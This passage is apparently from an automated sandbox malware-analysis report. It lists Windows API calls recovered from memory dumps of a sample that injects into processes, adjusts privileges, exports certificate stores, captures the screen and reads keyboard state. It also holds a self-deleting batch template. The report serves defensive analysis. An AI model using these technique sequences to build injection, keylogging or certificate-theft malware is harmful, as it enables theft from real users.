Part of subcall function 00FEBAD3: StringFromGUID2.OLE32(?), ref: 00FEBB92

CreateMutexW.KERNEL32(01002974,00000001,?), ref: 00FEBEA0
GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00FEBEAC
CloseHandle.KERNEL32 ref: 00FEBEBA

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FE45AE, Relevance: 5.6, APIs: 3, Instructions: 44

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00FE45D1
WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00FE45E9
DuplicateHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000001), ref: 00FE4604

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD03FD, Relevance: 5.6, APIs: 3, Instructions: 28

APIs

GetCurrentProcess.KERNEL32 ref: 00FD0400
VirtualProtect.KERNEL32(6FFF0000,00010000,00000020,?), ref: 00FD0421
FlushInstructionCache.KERNEL32(?,6FFF0000,00010000), ref: 00FD042A

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FE4159, Relevance: 5.5, APIs: 3, Instructions: 63

APIs

VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040), ref: 00FE4188

Part of subcall function 00FD6A7D: memcpy.MSVCRT ref: 00FD6A9C

WriteProcessMemory.KERNEL32(?,?,?,?,00000000), ref: 00FE41C7

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FE41EE

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD06B9, Relevance: 5.5, APIs: 3, Instructions: 37

APIs

GetCurrentThreadId.KERNEL32 ref: 00FD06CE
InterlockedCompareExchange.KERNEL32(0100276C), ref: 00FD06DA
VirtualProtect.KERNEL32(6FFF0000,00010000,00000040,?), ref: 00FD071E

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C299B5, Relevance: 4.4, APIs: 1, Strings: 1, Instructions: 19

APIs

CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,F0000040), ref: 00C299CD

Strings

Microsoft Enhanced Cryptographic Provider v1.0, xrefs: 00C299C5

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C2E524, Relevance: 4.2, APIs: 1, Instructions: 10

APIs

SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000), ref: 00C2E534

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3E8A2, Relevance: 3.9, APIs: 2, Instructions: 65

APIs

VirtualProtect.KERNEL32(00C39777,?,00000040,?), ref: 00C3E8BA
VirtualProtect.KERNEL32(00C39777,?,?,?), ref: 00C3E92D

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C3DD44, Relevance: 3.7, APIs: 2, Instructions: 16

APIs

UnmapViewOfFile.KERNEL32 ref: 00C3DD50
MapViewOfFile.KERNEL32(?,00000001,00000000,00000000,?), ref: 00C3DD67

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C4BEE3, Relevance: 2.8, APIs: 1, Instructions: 24

APIs

CreateMutexW.KERNEL32(00C62974,00000000,?), ref: 00C4BF05

Part of subcall function 00C32F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C32F37
Part of subcall function 00C32F31: CloseHandle.KERNEL32 ref: 00C32F49

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C40FD5, Relevance: 2.3, APIs: 1, Instructions: 21

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00C4BD4B,?), ref: 00C40FF2

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE0E64, Relevance: 2.2, APIs: 1, Instructions: 68

APIs

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

Part of subcall function 00FE0DFC: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00FE0E10

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FE0EBF

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C2E56C, Relevance: 2.1, APIs: 1, Instructions: 34

APIs

WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00C2E594

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00C40E64, Relevance: 2.0, APIs: 1, Instructions: 68

APIs

Part of subcall function 00C36997: HeapAlloc.KERNEL32(00000000,00000024,?,00C317BF,?,00000000,00C44986,?,?,00000001), ref: 00C369A8

Part of subcall function 00C40DFC: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00C40E10

Part of subcall function 00C36A69: HeapFree.KERNEL32(00000000,00F41E90,00C31877,?,00000000,00C44986,?,?,00000001), ref: 00C36A76

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C40EBF

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FD696E, Relevance: 1.9, APIs: 1, Instructions: 9

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 00FD6977

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C3696E, Relevance: 1.9, APIs: 1, Instructions: 9

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 00C36977

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Function 00FE0DFC, Relevance: 1.9, APIs: 1, Instructions: 8

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00FE0E10

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00C40DFC, Relevance: 1.9, APIs: 1, Instructions: 8

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00C40E10

Memory Dump Source

Source File: 00000002.00000002.827706237.00C20000.00000040.sdmp, Offset: 00C20000, based on PE: true

Non-executed Functions

Function 0351F2F7, Relevance: 44.3, APIs: 16, Strings: 6, Instructions: 134

APIs

Part of subcall function 0351E255: EncodePointer.KERNEL32(00000000,0351D714,?,0351D844,000000FF,?,0351EB61,00000011,?,?,0351E322,0000000D,?,00000000), ref: 0351E257

LoadLibraryW.KERNEL32(USER32.DLL), ref: 0351F332
GetProcAddress.KERNEL32(?,MessageBoxW), ref: 0351F34E
EncodePointer.KERNEL32(?,?,MessageBoxW), ref: 0351F35F
GetProcAddress.KERNEL32(?,GetActiveWindow), ref: 0351F36C
EncodePointer.KERNEL32(?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F36F
GetProcAddress.KERNEL32(?,GetLastActivePopup), ref: 0351F37C
EncodePointer.KERNEL32(?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F37F
GetProcAddress.KERNEL32(?,GetUserObjectInformationW), ref: 0351F38C
EncodePointer.KERNEL32(?,?,GetUserObjectInformationW,?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F38F
GetProcAddress.KERNEL32(?,GetProcessWindowStation), ref: 0351F3A0
EncodePointer.KERNEL32(?,?,GetProcessWindowStation,?,?,GetUserObjectInformationW,?,?,GetLastActivePopup,?,?,GetActiveWindow,?,?,MessageBoxW), ref: 0351F3A3
DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F3C5
DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F3CF
DecodePointer.KERNEL32(?,0355A89F,00000314), ref: 0351F40E
DecodePointer.KERNEL32(?), ref: 0351F428
DecodePointer.KERNEL32(0355A89F,00000314), ref: 0351F43C

Part of subcall function 0351F662: IsDebuggerPresent.KERNEL32 ref: 0352098D
Part of subcall function 0351F662: SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
Part of subcall function 0351F662: UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
Part of subcall function 0351F662: GetCurrentProcess.KERNEL32 ref: 035209C9
Part of subcall function 0351F662: TerminateProcess.KERNEL32 ref: 035209D0

Strings

USER32.DLL, xrefs: 0351F32D
MessageBoxW, xrefs: 0351F348
GetActiveWindow, xrefs: 0351F361
GetLastActivePopup, xrefs: 0351F371
GetUserObjectInformationW, xrefs: 0351F381
GetProcessWindowStation, xrefs: 0351F39A

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FE5087, Relevance: 34.4, APIs: 16, Strings: 1, Instructions: 241

APIs

Part of subcall function 00FD1B16: CreateFileW.KERNEL32(01111EF0,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00FD1B2F
Part of subcall function 00FD1B16: GetFileSizeEx.KERNEL32(?,?), ref: 00FD1B42
Part of subcall function 00FD1B16: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 00FD1B68
Part of subcall function 00FD1B16: ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00FD1B80
Part of subcall function 00FD1B16: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD1B9E
Part of subcall function 00FD1B16: CloseHandle.KERNEL32 ref: 00FD1BA7

CreateMutexW.KERNEL32(01002974,00000001,?), ref: 00FE512D
GetLastError.KERNEL32(?,?,00000001,?,?,?,00FE5452), ref: 00FE513D
CloseHandle.KERNEL32 ref: 00FE514B
CloseHandle.KERNEL32 ref: 00FE5229

Part of subcall function 00FE4BA2: memcpy.MSVCRT ref: 00FE4BB2

lstrlenW.KERNEL32(?), ref: 00FE51AD

Part of subcall function 00FF4181: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF41A1
Part of subcall function 00FF4181: Process32FirstW.KERNEL32(?,?), ref: 00FF41C6
Part of subcall function 00FF4181: OpenProcess.KERNEL32(00000400,00000000,?), ref: 00FF421D
Part of subcall function 00FF4181: CloseHandle.KERNEL32 ref: 00FF423B
Part of subcall function 00FF4181: GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00FF4257
Part of subcall function 00FF4181: memcmp.MSVCRT ref: 00FF426F
Part of subcall function 00FF4181: CloseHandle.KERNEL32(?), ref: 00FF42E7
Part of subcall function 00FF4181: Process32NextW.KERNEL32(?,?), ref: 00FF42F3
Part of subcall function 00FF4181: CloseHandle.KERNEL32 ref: 00FF4306

ExitWindowsEx.USER32(00000014,80000000), ref: 00FE51DD
OpenEventW.KERNEL32(00000002,00000000,?), ref: 00FE5203
SetEvent.KERNEL32 ref: 00FE5210
CloseHandle.KERNEL32 ref: 00FE5217
IsWellKnownSid.ADVAPI32(01111EC0,00000016), ref: 00FE5279
CreateEventW.KERNEL32(01002974,00000001,00000000,?), ref: 00FE5348
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FE5361
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00FE5373
CloseHandle.KERNEL32(00000000), ref: 00FE538A
CloseHandle.KERNEL32(?), ref: 00FE5390
CloseHandle.KERNEL32(?), ref: 00FE5396

Part of subcall function 00FD2FB7: ReleaseMutex.KERNEL32 ref: 00FD2FBB
Part of subcall function 00FD2FB7: CloseHandle.KERNEL32 ref: 00FD2FC2

Part of subcall function 00FDE8A2: VirtualProtect.KERNEL32(00FD9777,?,00000040,?), ref: 00FDE8BA
Part of subcall function 00FDE8A2: VirtualProtect.KERNEL32(00FD9777,?,?,?), ref: 00FDE92D

Part of subcall function 00FEBAD3: memcpy.MSVCRT ref: 00FEBAEE
Part of subcall function 00FEBAD3: StringFromGUID2.OLE32(?), ref: 00FEBB92

Part of subcall function 00FD99FA: LoadLibraryW.KERNEL32(?), ref: 00FD9A1C
Part of subcall function 00FD99FA: GetProcAddress.KERNEL32(?,?), ref: 00FD9A40
Part of subcall function 00FD99FA: SHGetFolderPathW.SHELL32(00000000,00000007,000000FF,00000001,?), ref: 00FD9A78
Part of subcall function 00FD99FA: lstrlenW.KERNEL32(?), ref: 00FD9A90
Part of subcall function 00FD99FA: StrCmpNIW.SHLWAPI(?,?), ref: 00FD9AA4
Part of subcall function 00FD99FA: lstrlenW.KERNEL32(?), ref: 00FD9ABA
Part of subcall function 00FD99FA: memcpy.MSVCRT ref: 00FD9AC6
Part of subcall function 00FD99FA: FreeLibrary.KERNEL32 ref: 00FD9ADC
Part of subcall function 00FD99FA: NetUserEnum.NETAPI32(00000000,00000000,00000002,?,000000FF,?,?,?), ref: 00FD9B1B
Part of subcall function 00FD99FA: NetUserGetInfo.NETAPI32(00000000,00000000,00000017,?), ref: 00FD9B57
Part of subcall function 00FD99FA: NetApiBufferFree.NETAPI32(?), ref: 00FD9C02
Part of subcall function 00FD99FA: NetApiBufferFree.NETAPI32(00000000), ref: 00FD9C14
Part of subcall function 00FD99FA: SHGetFolderPathW.SHELL32(00000000,00008007,000000FF,00000001,?), ref: 00FD9C33

Part of subcall function 00FD5433: CharToOemW.USER32(01111EF0,?), ref: 00FD5444

Part of subcall function 00FEB0C1: GetCommandLineW.KERNEL32 ref: 00FEB0DB
Part of subcall function 00FEB0C1: CommandLineToArgvW.SHELL32 ref: 00FEB0E2
Part of subcall function 00FEB0C1: StrCmpNW.SHLWAPI(?,00FC7F1C,00000002), ref: 00FEB108
Part of subcall function 00FEB0C1: LocalFree.KERNEL32 ref: 00FEB134
Part of subcall function 00FEB0C1: MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,00001000), ref: 00FEB171
Part of subcall function 00FEB0C1: memcpy.MSVCRT ref: 00FEB184
Part of subcall function 00FEB0C1: UnmapViewOfFile.KERNEL32 ref: 00FEB1BD
Part of subcall function 00FEB0C1: memcpy.MSVCRT ref: 00FEB1E0
Part of subcall function 00FEB0C1: CloseHandle.KERNEL32 ref: 00FEB1F9

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FEBEE3: CreateMutexW.KERNEL32(01002974,00000000,?), ref: 00FEBF05

Part of subcall function 00FD9925: memcpy.MSVCRT ref: 00FD993C
Part of subcall function 00FD9925: memcmp.MSVCRT ref: 00FD995E
Part of subcall function 00FD9925: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00FD998C
Part of subcall function 00FD9925: lstrcmpiW.KERNEL32(?), ref: 00FD99DC

Part of subcall function 00FD1BB5: VirtualFree.KERNEL32(?,00000000,00008000), ref: 00FD1BC6
Part of subcall function 00FD1BB5: CloseHandle.KERNEL32 ref: 00FD1BD5

Strings

C:\Documents and Settings\Administrator\Application Data, xrefs: 00FE5304

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD50C0, Relevance: 18.5, APIs: 8, Strings: 1, Instructions: 60

APIs

GetCurrentThread.KERNEL32 ref: 00FD50D4
OpenThreadToken.ADVAPI32 ref: 00FD50DB
GetCurrentProcess.KERNEL32 ref: 00FD50EB
OpenProcessToken.ADVAPI32 ref: 00FD50F2
LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 00FD5113
AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 00FD5128
GetLastError.KERNEL32 ref: 00FD5132
CloseHandle.KERNEL32(00000001), ref: 00FD5143

Strings

SeTcbPrivilege, xrefs: 00FD5106

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FF4181, Relevance: 16.2, APIs: 9, Instructions: 128

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00FF41A1
Process32FirstW.KERNEL32(?,?), ref: 00FF41C6

Part of subcall function 00FEBE5A: CreateMutexW.KERNEL32(01002974,00000001,?), ref: 00FEBEA0
Part of subcall function 00FEBE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 00FEBEAC
Part of subcall function 00FEBE5A: CloseHandle.KERNEL32 ref: 00FEBEBA

OpenProcess.KERNEL32(00000400,00000000,?), ref: 00FF421D
CloseHandle.KERNEL32(?), ref: 00FF42E7

Part of subcall function 00FD500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00FD5020
Part of subcall function 00FD500E: GetTokenInformation.ADVAPI32(?,0000000C,01002968,00000004,?), ref: 00FD5048
Part of subcall function 00FD500E: CloseHandle.KERNEL32(?), ref: 00FD505E

CloseHandle.KERNEL32 ref: 00FF423B
GetLengthSid.ADVAPI32(?,?,?,?,?,?,?,00000001), ref: 00FF4257
memcmp.MSVCRT ref: 00FF426F

Part of subcall function 00FD6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?,?), ref: 00FD6A43
Part of subcall function 00FD6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00FECB50,?,00000000,00000001,00000001,00FECB1A,?,00FD54E4,?,@echo off%sdel /F "%s",?), ref: 00FD6A56

Part of subcall function 00FF40CB: OpenProcess.KERNEL32(0000047A,00000000,?), ref: 00FF40DC
Part of subcall function 00FF40CB: CreateThread.KERNEL32(00000000,00000000,00FF40AB,?), ref: 00FF4132
Part of subcall function 00FF40CB: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FF413D
Part of subcall function 00FF40CB: CloseHandle.KERNEL32 ref: 00FF4144
Part of subcall function 00FF40CB: WaitForSingleObject.KERNEL32(?,00002710), ref: 00FF4154
Part of subcall function 00FF40CB: CloseHandle.KERNEL32(?), ref: 00FF415B
Part of subcall function 00FF40CB: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00FF416C
Part of subcall function 00FF40CB: CloseHandle.KERNEL32 ref: 00FF4173

Process32NextW.KERNEL32(?,?), ref: 00FF42F3
CloseHandle.KERNEL32 ref: 00FF4306

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FCDFE6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115

APIs

EnterCriticalSection.KERNEL32 ref: 00FCE010
LeaveCriticalSection.KERNEL32 ref: 00FCE0C0

Part of subcall function 00FD4085: LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00FD4097
Part of subcall function 00FD4085: GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 00FD40AF
Part of subcall function 00FD4085: CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00FD40EE
Part of subcall function 00FD4085: CreateCompatibleDC.GDI32 ref: 00FD40FF
Part of subcall function 00FD4085: LoadCursorW.USER32(00000000,00007F00), ref: 00FD4115
Part of subcall function 00FD4085: GetIconInfo.USER32(?,?), ref: 00FD4129
Part of subcall function 00FD4085: GetCursorPos.USER32(?), ref: 00FD4138
Part of subcall function 00FD4085: GetDeviceCaps.GDI32(?,00000008), ref: 00FD414F
Part of subcall function 00FD4085: GetDeviceCaps.GDI32(?,0000000A), ref: 00FD4158
Part of subcall function 00FD4085: CreateCompatibleBitmap.GDI32(?,?), ref: 00FD4164
Part of subcall function 00FD4085: SelectObject.GDI32 ref: 00FD4172
Part of subcall function 00FD4085: BitBlt.GDI32(?,00000000,00000000,?,0000000A,?,00000000,00000000,40CC0020), ref: 00FD4193
Part of subcall function 00FD4085: DrawIcon.USER32(?,?,?,?), ref: 00FD41C5
Part of subcall function 00FD4085: SelectObject.GDI32(?,00000008), ref: 00FD41E1
Part of subcall function 00FD4085: DeleteObject.GDI32 ref: 00FD41E8
Part of subcall function 00FD4085: DeleteDC.GDI32 ref: 00FD41EF
Part of subcall function 00FD4085: DeleteDC.GDI32 ref: 00FD41F6
Part of subcall function 00FD4085: FreeLibrary.KERNEL32(?), ref: 00FD4206
Part of subcall function 00FD4085: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 00FD421C
Part of subcall function 00FD4085: FreeLibrary.KERNEL32(?), ref: 00FD4230

GetTickCount.KERNEL32 ref: 00FCE06A
GetCurrentProcessId.KERNEL32 ref: 00FCE071

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

GetKeyboardState.USER32(?), ref: 00FCE0DC
ToUnicode.USER32(?,?,?,?,00000009,00000000), ref: 00FCE0FF

Part of subcall function 00FCDE64: EnterCriticalSection.KERNEL32(?,?,?,?,?,00FCE138,?,?,?,?,?,00000009,00000000), ref: 00FCDE7E
Part of subcall function 00FCDE64: memcpy.MSVCRT ref: 00FCDEEF
Part of subcall function 00FCDE64: memcpy.MSVCRT ref: 00FCDF13
Part of subcall function 00FCDE64: memcpy.MSVCRT ref: 00FCDF2A
Part of subcall function 00FCDE64: memcpy.MSVCRT ref: 00FCDF4A
Part of subcall function 00FCDE64: LeaveCriticalSection.KERNEL32 ref: 00FCDF65

Strings

, xrefs: 00FCE11D

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FCAB81, Relevance: 12.1, APIs: 8, Instructions: 147

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,00000000), ref: 00FCABB8
GetCommandLineW.KERNEL32 ref: 00FCABD9

Part of subcall function 00FF4333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00FF435D
Part of subcall function 00FF4333: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,?,?,?,00000000,00000000), ref: 00FF4392

GetUserNameExW.SECUR32(00000002,?), ref: 00FCAC11
GetProcessTimes.KERNEL32(000000FF,?,?,?,?), ref: 00FCAC47
GetUserDefaultUILanguage.KERNEL32 ref: 00FCACB9
memcpy.MSVCRT ref: 00FCACED
memcpy.MSVCRT ref: 00FCAD02
memcpy.MSVCRT ref: 00FCAD18

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD69B0: HeapAlloc.KERNEL32(00000008,?,?,00FD519B,?,?,?,?,00FE46A1,?,00FE49A5,?,?,00000001), ref: 00FD69C1

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FD24AA, Relevance: 10.8, APIs: 6, Instructions: 91

APIs

CertOpenSystemStoreW.CRYPT32(00000000), ref: 00FD24BC
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 00FD24DA
CertEnumCertificatesInStore.CRYPT32(?,?,?,00000000), ref: 00FD24E7
PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000), ref: 00FD251B

Part of subcall function 00FD6997: HeapAlloc.KERNEL32(00000000,00000024,?,00FD17BF,?,00000000,00FE4986,?,?,00000001), ref: 00FD69A8

PFXExportCertStoreEx.CRYPT32(?,?,?,00000000,00000004,?,?,?,00000000,00000004,?,?,?,00000000), ref: 00FD254D

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FD258C: GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 00FD25BA
Part of subcall function 00FD258C: GetSystemTime.KERNEL32(?), ref: 00FD260D
Part of subcall function 00FD258C: CharLowerW.USER32(?), ref: 00FD265D
Part of subcall function 00FD258C: PathRenameExtensionW.SHLWAPI(?,?), ref: 00FD268D

CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 00FD257C

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 0351F662, Relevance: 10.0, APIs: 5, Instructions: 58

APIs

IsDebuggerPresent.KERNEL32 ref: 0352098D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 035209A2
UnhandledExceptionFilter.KERNEL32(0353E630), ref: 035209AD
GetCurrentProcess.KERNEL32 ref: 035209C9
TerminateProcess.KERNEL32 ref: 035209D0

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FE3C8C, Relevance: 9.6, APIs: 5, Instructions: 138

APIs

Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE439E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI ref: 00FE43A8
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE43F1
Part of subcall function 00FE432D: memcpy.MSVCRT ref: 00FE441E
Part of subcall function 00FE432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00FE4428

FindFirstFileW.KERNEL32(?,?), ref: 00FE3CCB
SetLastError.KERNEL32(?,?,?,?), ref: 00FE3DF6

Part of subcall function 00FE3E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00FE3E98
Part of subcall function 00FE3E6B: PathMatchSpecW.SHLWAPI(00000010), ref: 00FE3EB7

FindNextFileW.KERNEL32(?,?), ref: 00FE3DC0
GetLastError.KERNEL32(?,?), ref: 00FE3DD9
FindClose.KERNEL32 ref: 00FE3DEF

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 00FEBC3E, Relevance: 9.1, APIs: 5, Instructions: 172

APIs

memset.MSVCRT ref: 00FEBC73
GetComputerNameW.KERNEL32(?,?), ref: 00FEBCA7
GetVersionExW.KERNEL32(?), ref: 00FEBCD0
memset.MSVCRT ref: 00FEBCEF

Part of subcall function 00FE0D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 00FE0D60

Part of subcall function 00FE0D19: RegFlushKey.ADVAPI32 ref: 00FE0D29
Part of subcall function 00FE0D19: RegCloseKey.ADVAPI32 ref: 00FE0D31

Part of subcall function 00FC9A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 00FC9ACA
Part of subcall function 00FC9A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 00FC9AEF

memset.MSVCRT ref: 00FEBDF4

Part of subcall function 00FD6A69: HeapFree.KERNEL32(00000000,01111E90,00FD1877,?,00000000,00FE4986,?,?,00000001), ref: 00FD6A76

Part of subcall function 00FC9A2A: CryptDestroyHash.ADVAPI32 ref: 00FC9A42
Part of subcall function 00FC9A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00FC9A53

Part of subcall function 00FC9B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 00FC9B41

Part of subcall function 00FE0FD5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00FEBD4B,?), ref: 00FE0FF2

Part of subcall function 00FE0E64: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00FE0EBF

Memory Dump Source

Source File: 00000002.00000002.827929518.00FC0000.00000040.sdmp, Offset: 00FC0000, based on PE: true

Function 0351E8DB, Relevance: 7.6, APIs: 5, Instructions: 54

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 0351E912
GetCurrentProcessId.KERNEL32 ref: 0351E91E
GetCurrentThreadId.KERNEL32 ref: 0351E926
GetTickCount.KERNEL32 ref: 0351E92E
QueryPerformanceCounter.KERNEL32(?), ref: 0351E93A

Memory Dump Source

Source File: 00000002.00000002.828112965.03501000.00000020.sdmp, Offset: 03500000, based on PE: true

Associated: 00000002.00000002.828095997.03500000.00000002.sdmp
Associated: 00000002.00000002.828175402.03522000.00000002.sdmp
Associated: 00000002.00000002.828231158.03540000.00000008.sdmp
Associated: 00000002.00000002.828283216.03559000.00000004.sdmp
Associated: 00000002.00000002.828301623.0355C000.00000002.sdmp

Function 00FCAA04, Relevance: 6.0, APIs: 4, Instructions: 45

APIs

